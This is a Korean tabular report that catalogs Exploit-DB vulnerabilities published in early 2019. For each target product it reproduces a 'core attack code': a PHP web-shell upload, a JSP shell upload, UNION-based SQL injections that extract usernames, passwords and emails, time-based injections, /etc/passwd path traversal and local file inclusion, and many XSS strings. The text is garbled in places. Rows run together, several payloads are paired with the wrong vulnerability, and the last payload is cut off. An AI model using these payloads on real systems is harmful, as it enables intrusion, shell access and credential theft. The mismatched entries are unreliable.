2019-02-15 46389 File Upload 하 상
UniSharp Laravel File Manager
2.0.0-alpha7 - Arbitrary File
Upload
POST /10.0.100.24/laravel-filemanager/upload HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0)Gecko/20100101 Firefox/54.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://10.0.100.24:1004/laravel-filemanager?type=FilesContent-Length: 527Connection: keep-alive
-----------------------------260082409123824'Content-Disposition: form-data; name="upload[]";filename="c0w.php"'Content-Type: text/plainHappy Hacking!!<?
"system($_REQUEST['cmd']);"?>------------------------------------------------260082409123824Content-Disposition: form-data; name="working_dir"/1-----------------------------260082409123824'Content-Disposition: form-data; name="type"
Files-----------------------------260082409123824Content-Disposition: form-data; name="_token"
UniSharp LaravelFile Manager
UniSharp
Laravel FileManager
2.0.0-alpha7
2019-02-15 46387 SQL Injection 하 하
qdPM 9.1 -
'search_by_extrafields[]' SQL
Injection
search[keywords]=&search_by_extrafields[]=%5c qdPM qdPM 9.1
POST/10.0.100.24/common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1Host: 10.0.100.24:1004
Content-Length: 508Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98Safari/537.36Content-Type: multipart/form-data; boundary=----aaa
Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,vi;q=0.8Connection: close
------aaaContent-Disposition: form-data; name="sspsetup"Attach------aaaContent-Disposition: form-data; name="module"CustomLogin------aaaContent-Disposition: form-data; name="filePath";
filename="test.jsp"Content-Type: text/htmlThis is shell content------aaaContent-Disposition: form-data; name="hmtlcontent"------aaa--
2019-02-18 46408 XSS 하 하Comodo Dome Firewall 2.7.0 -
Cross-Site Scripting
username="><script>alert(1)</script>comment=<script>alert(2)</script>admin_name=<script>alert(3)</script>name=<script>alert(4)</script>surname=<script>alert(5)</script>newLicense=<script>alert(6)</script>organization="><script>alert(7)</script>BACKUP_RCPTTO=<script>alert(8)</script>netmask_addr=<script>alert(9)</script>
Comodo DomeFirewall
Comodo DomeFirewall2.7.0
2019-02-18 46406 XSS 하 하Apache CouchDB 2.3.0 - Cross-
Site Scripting
Database = <img src=x onerror=alert(1)>Put = <img src=x onerror=alert(2)>Delete = <img src=x onerror=alert(2)>
Apache CouchDBApache
CouchDB 2.3.0
2019-02-18 46402 SQL Injection 하 하CMSsite 1.0 - 'post' SQL
Injection
POST /10.0.100.24/CMSsite/post.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhostConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
post=1%20and%20(sleep(10))
CMSsite CMSsite 1.0
2019-02-18 46399 XSS 하 하qdPM 9.1 - 'search[keywords]'
Cross-Site Scripting
POST /10.0.100.24/qdpm/index.php/users HTTP/1.1Host: 10.0.100.24:1004
Content-Length: 73Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9
qdPM qdPM 9.1
2019-02-18 46398 XSS 하 하qdPM 9.1 - 'type' Cross-Site
Scripting
GET/10.0.100.24/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
qdPM qdPM 9.1
Zoho ManageEngine
ServiceDesk Plus (SDP) < 10.0
build 10012 - Arbitrary File
Upload
Zoho ManageEngineServiceDesk Plus
(SDP)
ZohoManageEngineServiceDeskPlus (SDP) <10.0 build
10012
2019-02-18 46413 File Upload 하 상
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-02-19 46426 XSS 하 하Ask Expert Script 3.0.5 - Cross
Site Scripting
GET
/10.0.100.24/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
Ask Expert ScriptAsk ExpertScript 3.0.5
2019-02-19 46426 SQL Injection 하 하Ask Expert Script 3.0.5 - SQL
Injection
POST /10.0.100.24/list-details.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Host: localhostConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
view=select * FROM users WHERE login = "victor" ANDpassword="123"
Ask Expert ScriptAsk ExpertScript 3.0.5
2019-02-19 46425 Directory Traversal 중 하
Zoho ManageEngine Netflow
Analyzer Professional 7.0.0.2 -
Path Traversal
bussAlert=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=truecustomDev=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=trueselSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true
Zoho ManageEngineNetflow
ZohoManageEngine
NetflowAnalyzer
Professional7.0.0.2
2019-02-19 46425 XSS 하 하
Zoho ManageEngine Netflow
Analyzer Professional 7.0.0.2 -
Cross-Site Scripting
bussAlert=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fs
cript%3efc8z7&bussAlert=true
customDev=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=trueselSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true
Zoho ManageEngineNetflow AnalyzerProfessional
Zoho
ManageEngine
NetflowAnalyzer
Professional7.0.0.2
2019-02-19 46424 SQL Injection 하 하 XAMPP 5.6.8 - SQL Injection
POST /10.0.100.24/xampp/cds.php? HTTP/1.1
Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhostConnection: Keep-alive
Accept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
XAMPP XAMPP 5.6.8
2019-02-19 46424 XSS 하 하XAMPP 5.6.8 - Persistent Cross-
Site Scripting
GET /10.0.100.24/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29 HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
XAMPP XAMPP 5.6.8
2019-02-19 46423 SQL Injection 하 하 eDirectory - SQL Injection
POST /10.0.100.24/xampp/cds-fpdf.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Host: localhost
Connection: Keep-aliveAccept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29
eDirectory eDirectory
2019-02-19 46420 XSS 하 하
Zuz Music 2.1 -
'zuzconsole/___contact '
Persistent Cross-Site Scripting
POST /10.0.100.24/gmusic/zuzconsole/___contact HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 155Accept: application/json, text/plain, */*Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Content-Type: application/json;charset=UTF-8Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflateX-XSS-Protection: 0
{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}
Zuz Music Zuz Music 2.1
2019-02-19 46419 SQL Injection 하 하Listing Hub CMS 1.0 -
'pages.php id' SQL Injection
GET/10.0.100.24/pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1
Listing Hub CMSListing Hub
CMS 1.0
2019-02-19 46418 SQL Injection 중 하
Find a Place CMS Directory 1.5
- 'assets/external/data_2.php
cate' SQL Injection
POST /10.0.100.24/find/assets/external/data_2.php HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 251Accept: application/json, text/javascript, */*; q=0.01Origin: https://themerig.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://server/find/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
cate=2.9') UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
Find a Place CMS
Directory
Find a Place
CMS Directory1.5
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-02-20 46429 XSS 하 하HotelDruid 2.3 - Cross-Site
Scripting
GET /10.0.100.24/hoteldruid/visualizza_tabelle.php?nsextt=x"onmouseover=alert(0x000981) x=" HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
GET/10.0.100.24/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"onmouseover="alert(8562604) HTTP/1.1Host: 10.0.100.24:1004
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
HotelDruidHotelDruid
2.3
2019-02-21 46440 SQL Injection 중 하 EI-Tube 3 - SQL Injection
POST /10.0.100.24/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23 HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 251Accept: application/json, text/javascript, */*; q=0.01Origin: https://themerig.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://server/find/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cate=2.9') UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL FROM users limit 1-- -
EI-Tube EI-Tube 3
2019-02-22 46450 Directory Traversal 하 중Micro Focus Filr 3.4.0.217 - Path
Traversal
GET/10.0.100.24/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwdHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)Gecko/20100101Firefox/60.0Accept: */*Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateCookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531Connection: close
Micro Focus FilrMicro Focus
Filr3.4.0.217
2019-02-25 46457 SQL Injection 하 하Advance Gift Shop Pro Script
2.0.3 - SQL Injection
GET/10.0.100.24/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product HTTP/1.1
Advance Gift ShopPro Script
Advance GiftShop Pro
Script 2.0.3
2019-02-25 46456 SQL Injection 하 하News Website Script 2.0.5 -
SQL Injection
GET/10.0.100.24/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri HTTP/1.1
News WebsiteScript
News WebsiteScript 2.0.5
2019-02-25 46455 XSS 하 하PHP Ecommerce Script 2.0.6 -
Cross-Site Scripting/10.0.100.24/?s=<scRiPt>alert(1)</ScrIpT>
PHP EcommerceScript
PHP EcommerceScript 2.0.6
2019-02-25 46455 SQL Injection 하 하PHP Ecommerce Script 2.0.6 -
SQL Injection
GET/10.0.100.24/?s=1%20and%20extractvalue(rand(),concat(0x7e,version())) HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
PHP Ecommerce
Script
PHP Ecommerce
Script 2.0.6
2019-02-28 46467 SQL Injection 하 하Joomla! Component J2Store <
3.3.7 - SQL Injection
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 139Content-Type: application/x-www-form-urlencodedConnection: Keep-aliveAccept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX
Joomla! ComponentJ2Store
Joomla!
ComponentJ2Store <3.3.7
2019-02-28 46461 SQL Injection 하 하
Simple Online Hotel
Reservation System - SQL
Injection
GET /10.0.100.24/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Simple OnlineHotel Reservation
System
Simple OnlineHotel
ReservationSystem
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-04 46498 XSS 하 중
Fiberhome AN5506-04-F
RP2669 - Persistent Cross-Site
Scripting
POST /10.0.100.24/goform/setUser HTTP/1.1Host: 10.0.100.24:1004Content-Length: 101Cache-Control: max-age=0Origin: http://192.168.1.1Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://192.168.1.1/management/account_admin.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: loginName=admin
Connection: close
account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new
FiberhomeFiberhome
AN5506-04-FRP2669
POST /10.0.100.24/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 1936DNT: 1Connection: close
CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D;1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D;1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7DUpgrade-Insecure-Requests: 1
2019-03-04 46495 XSS 중 중Bolt CMS 3.6.4 - Cross-Site
Scripting
POST /bolt/editcontent/pages HTTP/1.1Host: bolt-up3x24.bolt.dockerfly.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 562DNT: 1Connection: closeUpgrade-Insecure-Requests: 1
content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&
slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
BoltBolt CMS3.6.4
2019-03-04 46494 Directory Traversal 중 하
MarcomCentral FusionPro VDP
Creator < 10.0 - Directory
Traversal
POST /10.0.100.24/bolt/editcontent/pages HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 562DNT: 1
Connection: close
content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
MarcomCentral
MarcomCentral
FusionPro VDPCreator <
10.0
2019-03-04 46482 SQL Injection 중 중OOP CMS BLOG 1.0 - Multiple
SQL Injection
# http://localhost/[PATH]/search.php?search=1[SQLi]&submit=Search# http://localhost/[PATH]/post.php?id=17 [SQLi]# http://localhost/[PATH]/posts.php?id=4 [SQLi]# http://localhost/[PATH]/page.php?pageid=8 [SQLi]# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]
# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]
OOP CMS BLOGOOP CMS BLOG
1.0
2019-03-04 46481 SQL Injection 하 하elFinder 2.1.47 - 'PHP
connector' Command Injection
GET/10.0.100.24/php/connector.minimal.php?target=%s&width=539&heigh
t=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c HTTP/1.1
elFinderelFinder2.1.47
Craft CMS 3.1.12 Pro - Cross-
Site ScriptingCraft
Craft CMS3.1.12 Pro
2019-03-04 46496 XSS 중 중
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-03-05 46500 SQL Injection 하 하
OpenDocMan 1.3.4 -
'search.php where' SQL
Injection
GET/10.0.100.24/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=TrainingManual&exact_phrase=on HTTP/1.1
OpenDocManOpenDocMan
1.3.4
2019-03-07 46482 SQL Injection 중 중Kados R10 GreenBee - Multiple
SQL Injection
GET /10.0.100.24/search.php?search=1 [SQLi]&submit=SearchHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: _ga=GA1.2.1239644041.1549987630;
_gid=GA1.2.1694605918.1549987630Upgrade-Insecure-Requests: 1
/post.php?id=17 [SQLi]/posts.php?id=4 [SQLi]/page.php?pageid=8 [SQLi]/admin/viewUser.php?userid=34 [SQLi]/admin/replayMsg.php?msgid=4 [SQLi]
KadosKados R10GreenBee
2019-03-08 46517 XSS 중 중
OrientDB 3.0.17 GA Community
Edition - Cross-Site Request
Forgery / Cross-Site Scripting
POST /document/demodb/-1:-1 HTTP/1.1Host: 192.168.2.101:2480User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.2.101:2480/studio/index.htmlX-Requested-With: XMLHttpRequestContent-Type: application/json;charset=utf-8Content-Length: 133DNT: 1
Connection: closeCookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"OUser","@version":0,"@rid":"#-1:-
1","name":"test<script>alert(1)</script>","password":"test","roles":[],"status":"ACTIVE"}
OrientDB
OrientDB3.0.17 GACommunityEdition
2019-03-13 46538 XSS 하 하
pfSense 2.4.4-p1 (HAProxy
Package 0.59_14) - Persistent
Cross-Site Scripting
POST /10.0.100.24/haproxy/haproxy_listeners_edit.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-testContent-Type: application/x-www-form-urlencoded
Description="><script>alert("test")</script>
pfSense
pfSense
2.4.4-p1(HAProxy
Package0.59_14)
2019-03-13 46537 LFI 중 하
WordPress Plugin GraceMedia
Media Player 1.0 - Local File
Inclusion
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
WordPress Plugin
WordPressPlugin
GraceMediaMedia Player
1.0
2019-03-15 46549 XSS 하 중Vembu Storegrid Web Interface
4.4.0 - Multiple Vulnerabilities
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfai
lure.php?cn=gar&result=</font><script>alert(1);</script><font>
Vembu StoregridWeb Interface
VembuStoregrid Web
Interface4.4.0
2019-03-15 46548 SQL Injection 중 상ICE HRM 23.0 - Multiple
Vulnerabilities
GET/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22super
visor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%
20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELE
